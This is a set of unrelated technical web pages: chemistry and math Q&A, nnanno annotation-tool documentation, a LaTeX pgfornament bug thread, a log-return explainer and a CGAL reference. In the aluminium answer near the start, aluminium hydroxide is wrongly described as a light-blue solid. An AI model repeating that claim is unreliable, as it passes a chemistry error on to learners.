It is the same for the reaction of metallic aluminum. If only a little $$\ce{NaOH}$$ is available, the reaction will occur according to $$(1)$$. If enough $$\ce{NaOH}$$ is available, it will react according to $$(1) + 2·(4)$$, giving an equation $$(5)$$, which is: $$\ce{2 Al + 6 NaOH + 6 H2O -> 2 Na3[Al(OH)6] + 3 H2 \tag{5}}$$
• Both $\ce{Al}$ and $\ce{Al2O3}$ react with $\ce{NaOH}$ to produce first $\ce{Na[Al(OH)4]}$ (and of course something else, $\ce{H2}$ or $\ce{H2O}$). Now if enough $\ce{NaOH}$ is available, $\ce{Na[Al(OH)4]}$ reacts with it to produce at the end $\ce{Na3[Al(OH)6]}$ Mar 15 '21 at 15:12
I will answer your question in a more general way, since you already have a specific answer. Aluminium is definitely a metal, but it can manifest peculiar features of non-metals. Its oxide, $$\text{Al}_2\text{O}_3$$, is very inert, while the hydroxide $$\text{Al}(\text{OH})_3$$ is a light-blue jelly-like solid with amphoteric behavior, that is, it can react both with acids and bases. I suggest you read the "bible", Chemistry of the Elements by Greenwood and Earnshaw.
https://www.clutchprep.com/chemistry/practice-problems/107010/which-electron-transition-produces-light-of-the-highest-frequency-in-the-hydroge-1
# Problem: Which electron transition produces light of the highest frequency in the hydrogen atom?
###### FREE Expert Solution
We’re being asked to determine the electron transition that produces light of the highest frequency in the hydrogen atom. Recall that starting from n = 1, the distance between each energy level gets smaller as shown below:
All of the given transitions involve going from a higher energy level to a lower energy level: this means emission is involved. Recall that the energy of a photon is given by:
$\overline{){\mathbf{E}}{\mathbf{=}}{\mathbf{h\nu }}}$
We can see that energy and frequency are directly proportional: higher energy means higher frequency. The 5p → 1s transition spans the largest energy difference, so it produces light of the highest frequency, making (a) the answer.
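As a rough numeric check, here is a sketch using the Bohr-model energies $$E_n = -13.6\ \text{eV}/n^2$$ and an assumed value of Planck's constant (the orbital letter p doesn't affect the hydrogen level energy):

```python
H_EV_S = 4.135667696e-15  # Planck's constant in eV*s (assumed value)

def transition_frequency(n_hi, n_lo=1):
    # Bohr-model photon energy for the n_hi -> n_lo emission, in eV
    delta_e = 13.6 * (1 / n_lo**2 - 1 / n_hi**2)
    return delta_e / H_EV_S  # frequency in Hz, since E = h*nu

for n in (5, 4, 3, 2):
    print(f"{n}p -> 1s: {transition_frequency(n):.3e} Hz")
# The 5p -> 1s value is the largest, confirming answer (a)
```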
###### Problem Details
Which electron transition produces light of the highest frequency in the hydrogen atom?
a) 5p → 1s
b) 4p → 1s
c) 3p → 1s
d) 2p → 1s
https://math.stackexchange.com/questions/1556486/how-to-write-a-rigorous-proof-for-normalisers-n-gh-being-the-largest-subgr/1556913
# How to write a rigorous proof for normalisers $N_{G}(H)$ being the largest subgroups of $G$ such that $H \unlhd N_{G}(H)$
Prove that $N_G(H)=\{g \in G| gHg^{-1}=H\}$ is the largest subgroup of $G$ such that $H \unlhd N_G(H)$.
I have an idea of the proof that, if we assume $S \leq G$ with $H \unlhd S$ then $$\forall s \in S, \ sHs^{-1}=H$$
We know that for $S$ to be the largest subgroup of $G$ with this property, it should contain every element $g \in G$ with $gHg^{-1}=H$, hence $N_G(H)$ is the largest subgroup of $G$ with this property.
But how could I write this in rigorous mathematical language? Is this a sign that I do not have enough mathematical maturity?
• You might start by defining what you mean by "largest". If you do that properly then the proof is easy. If you do not then you have no hope of writing down a correct proof. – Derek Holt Dec 2 '15 at 13:44
• That is not what "largest" means here. It would not even make sense if the groups were infinite. – Derek Holt Dec 2 '15 at 13:47
• Try to show (1) that $N_G(H)$ is a subgroup containing $H$ and in which $H$ is normal. (2) any subgroup of $G$ containing $H$ and in which $H$ is normal, must be a subgroup of $N_G(H)$. – Nicky Hekster Dec 2 '15 at 13:48
• I do not think that you have grasped the right definition of largest - "proper", "strictly" do not apply here. – Nicky Hekster Dec 2 '15 at 13:55
• Largest means that if $K \le G$ and $H \unlhd K$, then $K \le N_G(H)$. – Derek Holt Dec 2 '15 at 13:57
To write this rigorously: Let $K \le G$ with $H \trianglelefteq K$, and let $k \in K$. Then $kHk^{-1} = H$ by the normality of $H$ in $K$. Hence $k \in N_G(H)$, and so $K \le N_G(H)$. (The other half, that $N_G(H)$ is itself a subgroup of $G$ containing $H$ in which $H$ is normal, follows directly from the definition of $N_G(H)$.)
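As a sanity check rather than part of the proof, you can brute-force $N_G(H)$ in a small finite group. Here is a sketch using SymPy's combinatorics module (the helper normalizer_elements is hypothetical, written only for illustration):

```python
from sympy.combinatorics import Permutation, PermutationGroup

# G = S_3, H = A_3; since A_3 is normal in S_3, N_G(H) should be all of G
G = PermutationGroup([Permutation([1, 0, 2]), Permutation([1, 2, 0])])
H = PermutationGroup([Permutation([1, 2, 0])])

def normalizer_elements(G, H):
    # brute force: all g in G with g H g^{-1} = H
    return [g for g in G.elements
            if all(g*h*g**-1 in H for h in H.elements)]

N = normalizer_elements(G, H)
print(len(N), G.order())  # 6 6 -- every element of S_3 normalizes A_3
```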
https://living-with-machines.github.io/nnanno/annotate.html
Tools to support creating and process annotation for samples of Newspaper Navigator data using Label Studio
from nbdev import *
## Annotating Newspaper Navigator data
Once you have created a sample of Newspaper Navigator data using sample, you might want to annotate it somehow. These annotations may function as the input for a machine learning model or could be used directly to explore images in the newspaper navigator data. The Examples section in the documentation shows how annotations can generate training data for machine learning tasks.
The bulk of annotation work is outsourced to label studio, which provides a flexible annotation system that supports annotations for various data types, including images and text. This module does a few steps to help process annotations produced through label studio. It is essentially a set of suggestions on how you can get label-studio set up with data from Newspaper Navigator.
First, we'll create a small sample of images we want to annotate using sample. If you have already done this step, you can skip this.
sampler = nnSampler()
df = sampler.create_sample(
50, "photos", start_year=1910, end_year=1920, year_sample=False
)
There are a few ways in which we can use label studio to annotate. For example, we could download images from our sample using sample.download_sample. However, if we have a large sample of images, we might want to do some annotating before downloading all of these images locally.
Label-studio supports annotating from a URL. We can use this combined with IIIF to annotate images without downloading them all first since IIIF is a flexible interface for getting images. IIIF also gives us flexibility in annotating at a smaller resolution/size before downloading higher-res images.
## Create label studio annotation tasks
Label-studio supports a load of different ways of setting up 'tasks'. In this context, a 'task' is an image to be annotated. One way of setting up tasks is to import a JSON file that defines them. To do this, we take an existing sample DataFrame and add a column image, which contains an IIIF URL.
#### create_label_studio_json[source]
create_label_studio_json(sample:Union[DataFrame, Type[nnSampler]], fname:Union[str, Path, NoneType]=None, original:bool=True, pct:Optional[int]=None, size:Optional[tuple]=None, preserve_asp_ratio:bool=True)
create a json file which can be used to upload tasks to label studio
We can pass in either a dataframe or nnSampler to create_label_studio_json. This is a simple function that will create a JSON file that can be used to create 'tasks' in label studio. In this example, we pass in size parameters. These are used to generate an IIIF URL that will request this size.
create_label_studio_json(df, "tasks.json", size=(500, 500))
This creates a JSON file we can use to load tasks into label-studio.
### Importing tasks into label studio
To avoid this documentation becoming out of date, I haven't included screenshots etc. However, you can currently (January 2021) create tasks in label studio via the GUI or by passing in tasks through the CLI. For example, to load the tasks and create a template for annotating classifications
label-studio init project_name --template=image_classification --input-path=tasks.json
You can then start label-studio and complete the rest of the setup via the GUI.
label-studio start ./project_name
## Setting up labeling
For a proper introduction to configuring your labels, consult the label studio documentation. One way in which you can set up labels is to use a template, as shown above. This template sets up an image classification task. There are other templates for different tasks. These templates consist of XML that defines your labels. They allow you to define how you want to label your images and share these definitions with others. For example:
<View>
<Choices name="choice" toName="image" showInLine="true" choice="multiple">
<Choice value="human"/>
<Choice value="animal"/>
<Choice value="human-structure"/>
<Choice value="landscape"/>
</Choices>
<Image name="image" value="$image"/>
</View>
You can change many other options in Label-studio. It also includes features such as adding a machine learning backend to support annotations.
### Notes on labelling using IIIF images
There are a few things to consider and be aware of when loading images via IIIF in label studio.
#### Missing images
Occasionally when you are doing your annotations in label studio for IIIF URLs, you will get a missing image error. This is probably because for some reason the IIIF URL has been generated incorrectly for that image, or that image doesn't exist via IIIF. If this happens, you can 'skip' this image in the annotation interface.
#### Setting a comfortable size for viewing
You can take advantage of the flexibility of IIIF by requesting images at a specific size when you create the tasks. This also helps speed up the loading of each image, since we often request a smaller-sized image that fits comfortably on a smallish screen.
#### Annotating vs training image size, resolution etc.
If you are annotating labels or classifications, you may decide to annotate at a smaller size or quality and work with a higher quality image when you come to training a model. If you are doing any annotations of pixels or regions of the image, you will want to be careful to make sure these aren't lost when moving between different sizes of the image.
Label studio supports a broad range of annotation tasks, which may require particular export formats, i.e. COCO or VOC for object detection. Since the processing of these outputs is task specific, this module only contains functionality for image classification and labeling tasks, as these were the tasks covered in the Programming Historian lessons for which this code was originally written.
### Exporting and processing CSV
Once you have finished annotating all your images or got too bored of annotating, you can export in various formats, including JSON and CSV. A CSV export is often sufficient for simple tasks and has the additional benefit of having a lower barrier to entry than JSON for people who aren't coders.
We'll now process the annotations we generated above and labeled using label studio
#### process_labels[source]
process_labels(x)
#### load_annotations_csv[source]
load_annotations_csv(csv:Union[str, Path], kind='classification')
from pathlib import Path
from typing import Union

import pandas as pd

def load_annotations_csv(csv: Union[str, Path], kind="classification"):
    # read the label studio CSV export (the full version may pass converters here)
    df = pd.read_csv(csv)
    if kind == "classification":
        df["label"] = df["choice"]
        return df
    if kind == "label":
        df["label"] = df["choice"].apply(process_labels)
        return df
As you can see above, this code doesn't do much to process the annotations into a DataFrame. The main things to note are the kind parameter. The CSV export for labelling tasks includes a column that contains a JSON with the labels. In this case, we use a pandas converter and eval and grab the choices, which returns a list of labels.
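The body of process_labels isn't shown above. Based on that description, a plausible sketch (the exact export format may differ, so treat this as an assumption rather than the library's actual code) is:

```python
from ast import literal_eval

def process_labels(x):
    # The labelling export stores choices as a stringified dict,
    # e.g. "{'choices': ['human', 'animal']}"; eval it and grab the list
    return literal_eval(x)["choices"]
```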
If we look at the columns from the annotation DataFrame we'll see that label studio kept the original metadata. We now have a new column label that contains our annotations. We also have a column choice containing the original column format from the label studio export, which will be different from the label column when processing labelling annotations.
annotation_df = load_annotations_csv("test_iiif_anno/label_studio_export.csv")
annotation_df.columns
Index(['batch', 'box', 'edition_seq_num', 'filepath', 'geographic_coverage',
'image', 'lccn', 'name', 'ocr', 'page_seq_num', 'page_url',
'place_of_publication', 'pub_date', 'publisher', 'score', 'url', 'id',
'choice', 'label'],
dtype='object')
We can now do the usual Pandas things to start exploring our annotations further. For example we can see how many of each label option we have
annotation_df["choice"].value_counts()
Human 52
no_human 16
Name: choice, dtype: int64
Once we have some annotations done, we'll often want to get the original images to work locally. This is particularly important if we are planning to train a machine learning model with these images. Although it is possible to train a model using the images from IIIF, since we'll usually be grabbing these images multiple times for each epoch, this isn't particularly efficient and isn't very friendly to the IIIF endpoint.
We can use the sampler.download_sample method to download our sample; we just pass in our annotation DataFrame, a folder we want to download images to, and an optional name for the 'log' of the download. We can also pass in different parameters to request different sizes etc. of the image. See the download_sample docs for more details.
sampler.download_sample(
"test_iiif_anno/test_dl", df=annotation_df, original=True, json_name="test_dl"
)
### Moving between local annotation and the cloud ☁
Although 'storage is cheap', it isn't free. One helpful feature of the IIIF annotations workflow is that it allows you to annotate 'locally,' i.e. on a personal computer and then quickly move the information required to download all the images into the cloud without having to pass the images themselves around. This is particularly useful if you will use a service like Google Colab to train a computer vision model, i.e. you don't have the resources to rent GPUs.
In the context of working with limited bandwidth, it might also be relatively time-consuming to download a large set of images. However, it might be feasible to get around this by annotating using the IIIF images and then using a service like google Colab when you want to grab the actual images files. Since Colab is running in the cloud with a big internet tube, this should be much more doable even if your internet is limited.
Once you have downloaded your images, you may want to check whether any images failed to download. You can do this using the check_download_df_match function.
#### check_download_df_match[source]
check_download_df_match(dl_folder:Union[Path, str], df:DataFrame)
This will let you know if you have a different number of downloaded images compared to the number of rows in the DataFrame.
check_download_df_match("test_iiif_anno/test_dl", annotation_df)
Length of DataFrame 68 and number of images in test_iiif_anno/test_dl 68 match 😀
## Working with the annotations
This will really depend on the framework or library you want to use. In fastai the process is simple since our data matches one of the fastai 'factory' methods for loading data.
from fastai.vision.all import *
df = pd.read_json("test_iiif_anno/test_dl/test_dl.json")
dls = ImageDataLoaders.from_df(
df,
path="test_iiif_anno/test_dl",
label_col="choice",
item_tfms=Resize(64),
bs=4,
)
dls.show_batch()
## Process completions directly
Label studio stores annotations as json files so we can work with these directly without using the exports from label studio. This code below shows how to do this but the above approach is likely to be more reliable.
#### load_df[source]
load_df(json_file:Union[str, Path])
#### load_completions[source]
load_completions(path:Union[str, Path])
df = load_completions("../ph/ads/ad_annotations/")
0 1602237290 457001 1.014 [illustrations] {'image': 'http://localhost:8081/data/upload/d...
# df = load_completions('../ph/photos/multi_label/')
#### anno_sample_merge[source]
anno_sample_merge(sample_df:DataFrame, annotation_df:DataFrame)
anno_sample_merge merges a DataFrame containing a sample from Newspaper Navigator and a DataFrame containing annotations
## Parameters
sample_df : pd.DataFrame
    A Pandas DataFrame which holds a sample from Newspaper Navigator, generated by sample.nnSampler()
annotation_df : pd.DataFrame
    A Pandas DataFrame containing annotations loaded via the annotate.nnAnnotations class
## Returns
pd.DataFrame A new DataFrame which merges the two input DataFrames
sample_df = pd.read_csv("../ph/ads/sample.csv", index_col=0)
## class nnAnnotations[source]
nnAnnotations(df)
#### nnAnnotations.from_completions[source]
nnAnnotations.from_completions(path, kind, drop_dupes=True, sample_df=None)
annotations = nnAnnotations.from_completions(
)
annotations
nnAnnotations #annotations:549
annotations.labels
array(['illustrations', 'text-only'], dtype=object)
annotations.label_counts
text-only 376
illustrations 173
Name: result, dtype: int64
#### nnAnnotations.merge_sample[source]
nnAnnotations.merge_sample(sample_df)
annotations.merge_sample(sample_df)
filepath pub_date page_seq_num edition_seq_num batch lccn box score ocr place_of_publication geographic_coverage name publisher url page_url created_at id lead_time result data
0 iahi_gastly_ver01/data/sn82015737/00279529091/... 1860-03-09 447 1 iahi_gastly_ver01 sn82015737 [Decimal('0.30762831315880534'), Decimal('0.04... 0.950152 ['JTO', 'TMCE', 'An', 't%E', '3eott', 'County'... Davenport, Iowa ['Iowa--Scott--Davenport'] Daily Democrat and news. [volume] Maguire, Richardson & Co. https://news-navigator.labs.loc.gov/data/iahi_... https://chroniclingamerica.loc.gov/data/batche... 1602237486 iahi_gastly_ver01/data/sn82015737/00279529091/... 0.838 text-only iahi_gastly_ver01_data_sn82015737_00279529091_...
1 ohi_cobweb_ver04/data/sn85026050/00280775848/1... 1860-08-17 359 1 ohi_cobweb_ver04 sn85026050 [Decimal('0.5799164973813336'), Decimal('0.730... 0.985859 ['9', 'BI.', 'I', '.QJtf', 'A', 'never', 'fall... Fremont, Sandusky County [Ohio] ['Ohio--Sandusky--Fremont'] Fremont journal. [volume] I.W. Booth https://news-navigator.labs.loc.gov/data/ohi_c... https://chroniclingamerica.loc.gov/data/batche... 1602236992 ohi_cobweb_ver04/data/sn85026050/00280775848/1... 7.593 illustrations ohi_cobweb_ver04_data_sn85026050_00280775848_1...
#### nnAnnotations.export_merged[source]
nnAnnotations.export_merged(out_fn)
annotations.export_merged("testmerge.csv")
annotations = nnAnnotations.from_completions(
)
0 1602237290 457001 1.014 illustrations txdn_argentina_ver01_data_sn84022109_002111018...
1 1602237157 179001 2.068 text-only khi_earhart_ver01_data_sn85032814_00237283260_...
from nbdev.export import notebook2script
notebook2script()
Converted 00_core.ipynb.
Converted 01_sample.ipynb.
Converted 02_annotate.ipynb.
Converted 03_inference.ipynb.
Converted index.ipynb.
https://tex.stackexchange.com/questions/180224/problem-when-using-pgfplots-and-pgfornament
# Problem when using pgfplots and pgfornament
I am trying to solve a peculiar problem, but until now no success. Here is the issue:
1. I am writing a long document (a thesis) which consists of plots, decorations, and tables.
2. When I plot the graph using pgfplots, I get the plot as below:
3. But when I include the pgfornament package, then I get the following plot:
Here are the list of included packages before using pgfornament, and which gives the correct plot.
\documentclass[12pt,english]{report}
\usepackage{setspace}
\usepackage{babel}
\usepackage{buthesis}
\usepackage{amsmath,amssymb,graphicx,amsfonts,amsthm}
\usepackage{verbatim}
\usepackage{epsfig}
\usepackage{wrapfig}
\usepackage{latexsym,amsfonts,amscd}
\usepackage{changebar}
\usepackage{enumerate}
\usepackage{tikz}
\usetikzlibrary{decorations}
\usepackage{pgfplots}
\pgfplotsset{compat=1.3}
% Used only for example text
\usepackage{lipsum}
\usepackage[footnotesize,bf]{caption} % Reduces caption font sizes
\usepackage[Bjarne]{ThesisFncychap}
\include{BjarneThesisTitles}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%-----------------------------------------------------------------
%% figures, and list of tables
\usepackage[titles]{tocloft}
\setlength{\cftbeforechapskip}{-1ex}
\setlength{\cftbeforesecskip}{-3.5ex}
\setlength{\cftbeforesubsecskip}{-3.5ex}
\setlength{\cftbeforetabskip}{-3.5ex}
\setlength{\cftbeforefigskip}{-3.5ex}
%-----------------------------------------------------------------
\dissertation
Below is the code that gives the scrambled plot. The only difference between the first code and the code below is that I have included this line: \usepackage[object=vectorian]{pgfornament}. Also, I have about 10 plots like this, which LaTeX should automatically arrange over two pages. But after adding the pgfornament package, the plots are no longer spread over two pages; they all end up on one page and some get hidden in the margin.
\documentclass[12pt,english]{report}
\usepackage{setspace}
\usepackage{babel}
\usepackage{buthesis}
\usepackage{amsmath,amssymb,graphicx,amsfonts,amsthm}
\usepackage{verbatim}
\usepackage{epsfig}
\usepackage{wrapfig}
\usepackage{latexsym,amsfonts,amscd}
\usepackage{changebar}
\usepackage{enumerate}
% Do you use TikZ?
\usepackage{tikz}
\usetikzlibrary{decorations}
\usepackage[object=vectorian]{pgfornament}
\usepackage{pgfplots}
\pgfplotsset{compat=1.3}
% Used only for example text
\usepackage{lipsum}
\usepackage[footnotesize,bf]{caption} % Reduces caption font sizes
\usepackage[Bjarne]{ThesisFncychap}
\include{BjarneThesisTitles}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%-----------------------------------------------------------------
%% figures, and list of tables
\usepackage[titles]{tocloft}
%% Aesthetic spacing redefines that look nicer to me than the defaults.
\setlength{\cftbeforechapskip}{-1ex}
\setlength{\cftbeforesecskip}{-3.5ex}
\setlength{\cftbeforesubsecskip}{-3.5ex}
\setlength{\cftbeforetabskip}{-3.5ex}
\setlength{\cftbeforefigskip}{-3.5ex}
%-----------------------------------------------------------------
\dissertation
1. The word Data is ok, because I have set it myself using \centerline{Data}
Edited:

The above code is from the document on which I am working. To make the task simpler for readers, I am posting a very simplified version of the code where the problem still persists. This can be regarded as a minimal working example.
\documentclass[12pt]{report}
\title{A Very Simple \LaTeXe{} Template}
\author{
}
\date{\today}
\usepackage[object=vectorian]{pgfornament}
\usepackage{pgfplots}
\pgfplotsset{compat=1.3}
\begin{document}
\maketitle
\pgfplotsset{grid style={dashed}}
\pgfkeys{/pgfplots/MyLineStyle/.style={samples=50, ultra thick}}
\pgfkeys{
/pgf/number format/precision=3,
/pgf/number format/fixed zerofill=true }
\pgfplotsset{
tick label style={font=\LARGE},
label style={font=\LARGE},
legend style={font=\LARGE},
title style={font=\LARGE}
}
\tikzset{every mark/.append style={scale=2}}
\centerline {\textbf{Data}}
\begin{tikzpicture}[scale=0.70]
\begin{axis}[title={Data-Segment},
xlabel=Z,
ylabel=P,
xticklabel style={/pgf/number format/fixed,
/pgf/number format/precision=0},
grid=major,
]
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt,mark =*,style=densely dashed] coordinates {
(10,0.331)
(20,0.329)
(30,0.323)
(40,0.328)
(50,0.322)
(60,0.325)
(70,0.323)
(80,0.320)
(90,0.321)
(100,0.319)
};\label{p5}
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt] coordinates {
(10,0.32)
(20,0.32)
(30,0.319)
(40,0.318)
(50,0.315)
(60,0.315)
(70,0.315)
(80,0.31)
(90,0.310)
(100,0.310)
};\label{p6}
\end{axis}
\end{tikzpicture}
\begin{tikzpicture}[scale=0.70]
\begin{axis}[title={Data-Segment},
xlabel=Z,
ylabel=P,
legend style={ at={(1,0.5)},
anchor=east},
xticklabel style={/pgf/number format/fixed,
/pgf/number format/precision=0},
grid=major]
\addplot[color=black,mark options={black},mark size = 2,line width=1.5pt,mark =*,style=densely dashed] coordinates {
(10,0.331)
(20,0.329)
(30,0.323)
(40,0.328)
(50,0.322)
(60,0.325)
(70,0.323)
(80,0.320)
(90,0.321)
(100,0.319)
};
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt,mark=square*] coordinates {
(10,0.32)
(20,0.32)
(30,0.32)
(40,0.319)
(50,0.317)
(60,0.312)
(70,0.312)
(80,0.31)
(90,0.309)
(100,0.31)
};
\end{axis}
\end{tikzpicture}
\newline
\begin{tikzpicture}[scale=0.70]
\begin{axis}[title={Data-Segment},xlabel=Z,ylabel=P,legend style={ at={(1,0.5)}, anchor=east},grid=major,xticklabel style={/pgf/number format/fixed,
/pgf/number format/precision=0},
]
\addplot[color=black,mark options={black},mark size = 2,line width=1.5pt,mark =*,style=densely dashed] coordinates {
(10,0.331)
(20,0.329)
(30,0.323)
(40,0.328)
(50,0.322)
(60,0.325)
(70,0.323)
(80,0.320)
(90,0.321)
(100,0.319)
};
\addplot+[color=black,mark options={black},mark size = 2,line width=1.5pt,mark=square*] coordinates {
(10,0.320)
(20,0.319)
(30,0.319)
(40,0.320)
(50,0.314)
(60,0.318)
(70,0.319)
(80,0.32)
(90,0.322)
(100,0.328)
};
\end{axis}
\end{tikzpicture}
\bibliographystyle{abbrv}
\bibliography{simple}
\end{document}
• It is great you've posted code but please reduce it and complete it to a Minimum Working Example i.e. a complete, small document which people can compile to reproduce the issue. I, at least, do not have ThesisFncychap and have no idea where to obtain it. In any case, reducing the code to the minimum makes it much easier for people to understand and work on the problem. – cfr May 25 '14 at 2:25
• @cfr Thanks for pointing out a shortcoming in my question. I have added a MWE now. I hope this can help the readers. – puser May 25 '14 at 2:54
• I have downloaded pgfornament from altermundus.com/pages/tkz/ornament/index.html and could not reproduce the issue. Could you verify that it is still present with the most recent version of pgfornament? – Christian Feuersänger May 30 '14 at 18:17
• @Christian: I again installed all the components of pgfornament on my system the way it has been asked in the ornaments.pdf file that comes along with the package. But the problem still remains. Although I have come up with a quick-fix solution myself whereby I obtained the eps files of those graphs using externalization commands in latex, and then embedded those eps files in my thesis using \includegraphics. But directly using the pgfplots code with pgfornament does not work for me. I am using latex on Red Hat Linux. Ver: pdfTeX using libpoppler 3.141592-1.40.3-2.2 (Web2C 7.5.6) – puser May 31 '14 at 2:44
• latex --version command gives me the following output: pdfTeX using libpoppler 3.141592-1.40.3-2.2 (Web2C 7.5.6) kpathsea version 3.5.6 Copyright 2007 Peter Breitenlohner (eTeX)/Han The Thanh (pdfTeX). Kpathsea is copyright 2007 Karl Berry and Olaf Weber. (...some copyright information...) Compiled with libpng 1.2.46; using libpng 1.2.49 Compiled with zlib 1.2.3; using zlib 1.2.3 Compiled with libpoppler – puser May 31 '14 at 2:45
I have managed to reproduce the issue (don't know why my approach yesterday failed).
The root cause is a bug in pgfornament.sty: it globally overwrites the tikz key at. If I comment out pgfornament.sty line 97 so that it becomes
\tikzset{%
%at/.code={\def\ornamenttopos{#1}},
options/.style={options default,#1},
ornament symmetry/.code={\def\ornamenttosymmetry{#1}},
everything works.
I suggest you file a bug report for pgfornament.sty.
• @alain-matthes FYI – Christian Feuersänger May 31 '14 at 6:56
• Thanks. I will file this as a bug report with the author of pgfornament. – puser May 31 '14 at 7:35
• Thanks Christian for finding this problem. A possible fix is to write ornament/at/.code={\def\ornamenttopos{#1}}, instead of at/.code={\def\ornamenttopos{#1}}. Then you need to write ornament/at instead of at if you want to use this option – Alain Matthes May 31 '14 at 9:27
• I updated the package – Alain Matthes May 31 '14 at 17:00
https://www.rateofreturnexpert.com/log-return/
Log Return
Formula
The logarithmic return is a way of calculating the rate of return on an investment. To calculate it you need the initial value of the investment V_i, the final value V_f and the number of time periods t. You then take the natural logarithm of V_f divided by V_i, and divide the result by t:
R = ln(V_f / V_i) / t × 100%
This value is normally expressed as a percentage, so you also multiply by 100.
The calculated rate will depend on the value of t that you use. If t is the number of years, then you get an annual rate. This then gives you the continuously compounded annual interest rate that you would need to receive in order to match the return on this investment.
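In code, the formula is a one-liner. Here is a small Python sketch (the function and argument names are mine):
import math
def log_return(v_i, v_f, t):
    # continuously compounded rate of return, as a percentage per period
    return math.log(v_f / v_i) / t * 100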
Comparing Log Returns
Because the formula for log return takes the duration of the investment into account, it can be used to compare multiple investments that cover different lengths of time. Typically you would compare multiple investments using an annual rate, so t in the above formula will be the number of years.
The log return is less useful for comparing our investment with other investments that have a fixed interest rate, such as bank savings accounts, because these are normally quoted as a yearly compounded interest rate, and the log return is a continuously compounded rate.
Example
Jenny is a property investor. She buys a house for 100000. Exactly 3 years later she sells it for 120000. The logarithmic return is then:
R_j = ln(120000 / 100000) / 3 × 100%
R_j = 6.08%
(I've rounded the percentage to 2 decimal places here.)
Jenny's friend Stan also buys a house. He pays 95000 and sells it 18 months (1.5 years) later for 105000. Jenny and Stan would like to compare their returns, so Stan also calculates the log return:
R_s = ln(105000 / 95000) / 1.5 × 100%
R_s = 6.67%
From this we can see that Stan has got a better logarithmic rate of return than Jenny on his property investment.
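Plugging both examples into the Python sketch above reproduces these figures (up to rounding):
print(round(log_return(100000, 120000, 3), 2))    # 6.08  (Jenny)
print(round(log_return(95000, 105000, 1.5), 2))   # 6.67  (Stan)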
https://doc.cgal.org/4.7/Convex_hull_3/classConvexHullPolyhedron__3.html
CGAL 4.7 - 3D Convex Hulls
ConvexHullPolyhedron_3 Concept Reference
## Definition
Requirements of the polyhedron type built by the function CGAL::convex_hull_3().
Has Models:
CGAL::Polyhedron_3
## Types
typedef unspecified_type Point_3
type of point stored in a vertex
typedef unspecified_type Vertex
a model of ConvexHullPolyhedronVertex_3
typedef unspecified_type Halfedge
a model of ConvexHullPolyhedronHalfedge_3
typedef unspecified_type Facet
a model of ConvexHullPolyhedronFacet_3
typedef unspecified_type Halfedge_data_structure
halfedge data structure
typedef unspecified_type Halfedge_handle
handle to halfedge
typedef unspecified_type Halfedge_iterator
iterator for halfedge
typedef unspecified_type Facet_handle
handle to facet
typedef unspecified_type Facet_iterator
iterator for facet
## Creation
Only a default constructor is required.
ConvexHullPolyhedron_3 ()
## Operations
Facet_iterator facets_begin ()
iterator over all facets (excluding holes).
Facet_iterator facets_end ()
past-the-end iterator.
Halfedge_iterator halfedges_begin ()
iterator over all halfedges.
Halfedge_iterator halfedges_end ()
past-the-end iterator.
Halfedge_handle make_tetrahedron (Point_3 p1, Point_3 p2, Point_3 p3, Point_3 p4)
adds a new tetrahedron to the polyhedral surface with its vertices initialized with p1, p2, p3 and p4. More...
void erase_facet (Halfedge_handle h)
removes the incident facet of h and changes all halfedges incident to the facet into border edges or removes them from the polyhedral surface if they were already border edges.
Halfedge_handle add_vertex_and_facet_to_border (Halfedge_handle h, Halfedge_handle g)
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with two new halfedges and a new vertex and filling this separated part of the hole with a new facet, such that the new facet is incident to g. More...
Halfedge_handle add_facet_to_border (Halfedge_handle h, Halfedge_handle g)
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with a new halfedge and filling this separated part of the hole with a new facet, such that the new facet is incident to g. More...
Halfedge_handle fill_hole (Halfedge_handle h)
fills a hole with a newly created facet. More...
void delegate (Modifier_base< Halfedge_data_structure > &m)
calls the operator() of the modifier m. More...
## Member Function Documentation
Halfedge_handle ConvexHullPolyhedron_3::add_facet_to_border ( Halfedge_handle h, Halfedge_handle g )
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with a new halfedge and filling this separated part of the hole with a new facet, such that the new facet is incident to g.
Returns the halfedge of the new edge that is incident to the new facet.
Halfedge_handle ConvexHullPolyhedron_3::add_vertex_and_facet_to_border ( Halfedge_handle h, Halfedge_handle g )
creates a new facet within the hole incident to h and g by connecting the tip of g with the tip of h with two new halfedges and a new vertex and filling this separated part of the hole with a new facet, such that the new facet is incident to g.
Returns the halfedge of the new edge that is incident to the new facet and the new vertex.
void ConvexHullPolyhedron_3::delegate ( Modifier_base< Halfedge_data_structure > & m)
calls the operator() of the modifier m.
See Modifier_base for a description of modifier design and its usage.
Halfedge_handle ConvexHullPolyhedron_3::fill_hole ( Halfedge_handle h)
fills a hole with a newly created facet.
Makes all border halfedges of the hole denoted by h incident to the new facet. Returns h.
Halfedge_handle ConvexHullPolyhedron_3::make_tetrahedron ( Point_3 p1, Point_3 p2, Point_3 p3, Point_3 p4 )
adds a new tetrahedron to the polyhedral surface with its vertices initialized with p1, p2, p3 and p4.
Returns that halfedge of the tetrahedron whose incident vertex is initialized with p1; the incident vertex of the next halfedge is initialized with p2, and the vertex thereafter with p3. The remaining fourth vertex is initialized with p4.
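For orientation, here is how a model of this concept typically gets built in practice: CGAL::convex_hull_3() fills the listed model, CGAL::Polyhedron_3, from a range of points. A minimal C++ sketch in the spirit of the CGAL 4.7 convex-hull examples (the kernel choice and sample points are mine):
#include <CGAL/Exact_predicates_inexact_constructions_kernel.h>
#include <CGAL/Polyhedron_3.h>
#include <CGAL/convex_hull_3.h>
#include <iostream>
#include <vector>
typedef CGAL::Exact_predicates_inexact_constructions_kernel K;
typedef CGAL::Polyhedron_3<K> Polyhedron_3;
typedef K::Point_3 Point_3;
int main() {
    // five points; the last lies inside the tetrahedron formed by the first four
    std::vector<Point_3> points = {
        Point_3(0, 0, 0), Point_3(1, 0, 0), Point_3(0, 1, 0),
        Point_3(0, 0, 1), Point_3(0.25, 0.25, 0.25)
    };
    Polyhedron_3 hull; // the model of ConvexHullPolyhedron_3
    CGAL::convex_hull_3(points.begin(), points.end(), hull);
    std::cout << hull.size_of_vertices() << " vertices on the hull\n"; // expect 4
    return 0;
}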
